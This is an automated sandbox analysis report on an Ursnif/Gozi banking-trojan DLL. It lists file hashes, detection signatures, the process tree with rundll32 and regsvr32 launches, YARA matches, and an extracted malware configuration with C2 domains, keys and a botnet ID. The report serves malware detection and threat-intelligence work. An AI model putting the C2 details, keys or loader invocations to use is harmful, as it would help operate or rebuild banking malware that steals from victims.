Windows Analysis Report WTXuYxax6d.dll

Overview

General Information

Sample Name: WTXuYxax6d.dll
Analysis ID: 527046
MD5: cbe2a109ef92af54de51a534980151a7
SHA1: e71ab85a35df851229f87fde059ad35ed167bdbc
SHA256: 450a436cf830b03533a2ce0d8d40724d61c8b0e5f8164413c05d2c870b4ba8eb
Tags: dll, geo, Gozi, ISFB, ITA, ursnif

Detection

Ursnif
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Tries to load missing DLLs
Contains functionality to read the PEB
Registers a DLL
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6980 cmdline: loaddll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6992 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7012 cmdline: rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 7000 cmdline: regsvr32.exe /s C:\Users\user\Desktop\WTXuYxax6d.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 7020 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 7104 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7020 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 7052 cmdline: rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3684 cmdline: rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,azfdnkcrayghb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6164 cmdline: rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,bngggbakts MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "v1wySnSj0/Qezkq1+zqVG7OQdnxYD8ELZYNPMCkM69BOSUxuoiK8V9jGPFM/rZ9NhfGzVodUM3YW0nB89rcH84RZYG8DLN6HQCkubhXRasaUA7K7h+3lZamvjyookCKgwBWzlu6vCX1eURNonlpROKDMQKBVqofzDshoxJHbAdjZcKqCfEt5vgt07jQB8OABEnd9fROXGjobZcsdaOkEjTvELBFteszn3jqJa1HvAPkpE5gs00qstYhkLp1L+MgFUoKXEL4WViIcGGNpbyyXZKBlebQs4TypEMrC0SUg0PsB7mmSQ4ESN3oL02+qpL14r8rTcWPMVTQH9/bLARbe3XOvj+AriFcBjSRm8ai2Vy0=", "c2_domain": ["microsoft.com/windowsdisabler", "https://technoshoper.com", "https://avolebukoneh.website", "http://technoshoper.com", "http://avolebukoneh.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000003.620315557.00000000053B8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000002.883888908.0000000004D49000.00000004.00000040.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.613835753.00000000052F8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.rundll32.exe.2b80000.2.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.920000.2.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
3.2.rundll32.exe.a60000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.a80000.3.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.2.regsvr32.exe.4ea94a0.4.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 3.2.rundll32.exe.a60000.2.unpack, Malware Configuration Extractor: Ursnif (configuration identical to the one listed under "Malware Configuration" above)

Multi AV Scanner detection for submitted file
Source: WTXuYxax6d.dll, Virustotal: Detection: 18%
Source: WTXuYxax6d.dll, ReversingLabs: Detection: 25%

Multi AV Scanner detection for domain / URL
Source: technoshoper.com, Virustotal: Detection: 6%
Source: avolebukoneh.website, Virustotal: Detection: 6%
Source: http://avolebukoneh.website, Virustotal: Detection: 6%

Source: 3.2.rundll32.exe.a60000.2.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 2.2.regsvr32.exe.9f0000.2.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.920000.2.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_736D6AD0 CryptDecrypt,CryptImportKey,VirtualAlloc,0_2_736D6AD0
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_736D61F0 DllRegisterServer,VirtualAlloc,VirtualAlloc,CryptSetKeyParam,CryptAcquireContextA,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,CryptImportKey,CryptDecrypt,VirtualAlloc,VirtualAlloc,0_2_736D61F0
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_736D6AD0 CryptDecrypt,CryptImportKey,VirtualAlloc,2_2_736D6AD0
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_736D61F0 DllRegisterServer,VirtualAlloc,VirtualAlloc,CryptSetKeyParam,CryptAcquireContextA,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,CryptImportKey,CryptDecrypt,VirtualAlloc,VirtualAlloc,2_2_736D61F0
Source: WTXuYxax6d.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: unknown, HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.6:49823 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.6:49821 version: TLS 1.2
Source: WTXuYxax6d.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_736DA676 FindFirstFileExW,0_2_736DA676
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_736DA676 FindFirstFileExW,2_2_736DA676

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe, Domain query: avolebukoneh.website
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 45.9.20.245 187
Source: C:\Windows\SysWOW64\regsvr32.exe, Domain query: technoshoper.com
Source: Joe Sandbox View, ASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
Source: Joe Sandbox View, JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View, IP Address: 104.26.7.139 104.26.7.139
                      Source: unknown
                      DNS traffic detected: queries for: www.msn.com
                      Source: global traffic
                      HTTP traffic detected:
                        GET /tag?o=6208086025961472&upapi=true HTTP/1.1
                        Accept: application/javascript, */*;q=0.8
                        Referer: https://www.msn.com/de-ch/?ocid=iehp
                        Accept-Language: en-US
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Accept-Encoding: gzip, deflate
                        Host: btloader.com
                        Connection: Keep-Alive
                      Source: unknown
                      HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.6:49823 version: TLS 1.2
                      Source: unknown
                      HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.6:49821 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.612953290.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620302187.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612852123.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701957231.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.746687116.000000000186D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.768852725.000000000176F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.686987362.000000000503F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701777888.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702038882.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.724522780.000000000196B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.636697378.000000000517B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.681026277.0000000004F7F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620184852.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613707607.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701868957.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612982412.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613851431.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613762692.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6980, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b80000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.920000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.a80000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4ea94a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2bb0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.12994a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.b40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a60000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4ea94a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49a94a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b80000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a50000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.870000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d80000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4d494a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4d494a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49a94a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.880000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.12994a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a90000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.920000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.883888908.0000000004D49000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879831053.0000000000A50000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879772547.0000000000A40000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.884087885.00000000049A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.881330354.0000000004EA9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.879852238.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.880442482.0000000001299000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.878853677.0000000000870000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.879036722.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.878927946.0000000000880000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.879010768.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.879009895.0000000000920000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.880994352.0000000002B70000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.878979369.0000000000990000.00000004.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      Yara detected Ursnif
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_736D6AD0 CryptDecrypt,CryptImportKey,VirtualAlloc
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_736D61F0 DllRegisterServer,VirtualAlloc,VirtualAlloc,CryptSetKeyParam,CryptAcquireContextA,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,CryptImportKey,CryptDecrypt,VirtualAlloc,VirtualAlloc
                      Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_736D6AD0 CryptDecrypt,CryptImportKey,VirtualAlloc
                      Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_736D61F0 DllRegisterServer,VirtualAlloc,VirtualAlloc,CryptSetKeyParam,CryptAcquireContextA,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,CryptImportKey,CryptDecrypt,VirtualAlloc,VirtualAlloc

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: WTXuYxax6d.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 736D82C0 appears 60 times
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 736D82C0 appears 60 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A86307 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_00A86307
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A8B139 NtQueryVirtualMemory,0_2_00A8B139
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A6138A NtMapViewOfSection,3_2_00A6138A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A612E2 GetProcAddress,NtCreateSection,memset,3_2_00A612E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A6156C SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,3_2_00A6156C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A623D5 NtQueryVirtualMemory,3_2_00A623D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A96307 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_00A96307
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A9B139 NtQueryVirtualMemory,3_2_00A9B139
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B8138A NtMapViewOfSection,5_2_02B8138A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B8156C SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,5_2_02B8156C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B812E2 GetProcAddress,NtCreateSection,memset,5_2_02B812E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B823D5 NtQueryVirtualMemory,5_2_02B823D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BB6307 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_02BB6307
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BBB139 NtQueryVirtualMemory,5_2_02BBB139
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                      Source: WTXuYxax6d.dllVirustotal: Detection: 18%
                      Source: WTXuYxax6d.dllReversingLabs: Detection: 25%
                      Source: WTXuYxax6d.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\WTXuYxax6d.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,DllRegisterServer
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7020 CREDAT:17410 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,azfdnkcrayghb
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,bngggbakts
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5EF2C13C-4C8E-11EC-90E5-ECF4BB2D2496}.dat
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFCCE32108ABF6B532.TMP
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@17/114@45/3
                      Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A8A1D4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00A8A1D4
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
                      Source: WTXuYxax6d.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: WTXuYxax6d.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: WTXuYxax6d.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: WTXuYxax6d.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: WTXuYxax6d.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: WTXuYxax6d.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: WTXuYxax6d.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: WTXuYxax6d.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: WTXuYxax6d.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: WTXuYxax6d.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: WTXuYxax6d.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: WTXuYxax6d.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D78C0 push ecx; ret 0_2_736D78D3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A8ABD0 push ecx; ret 0_2_00A8ABD9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A8AF03 push ecx; ret 0_2_00A8AF13
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D78C0 push ecx; ret 2_2_736D78D3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A621A3 push ecx; ret 3_2_00A621B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A62150 push ecx; ret 3_2_00A62159
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A9ABD0 push ecx; ret 3_2_00A9ABD9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A9AF03 push ecx; ret 3_2_00A9AF13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B821A3 push ecx; ret 5_2_02B821B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B82150 push ecx; ret 5_2_02B82159
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BBABD0 push ecx; ret 5_2_02BBABD9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BBAF03 push ecx; ret 5_2_02BBAF13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A616C3 LoadLibraryA,GetProcAddress,3_2_00A616C3
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.13842205011

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4264Thread sleep time: -1773297476s >= -30000s
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5884Thread sleep time: -210000s >= -30000s
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736DA676 FindFirstFileExW,0_2_736DA676
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736DA676 FindFirstFileExW,2_2_736DA676
                      Source: regsvr32.exe, 00000002.00000003.778713654.0000000002F76000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
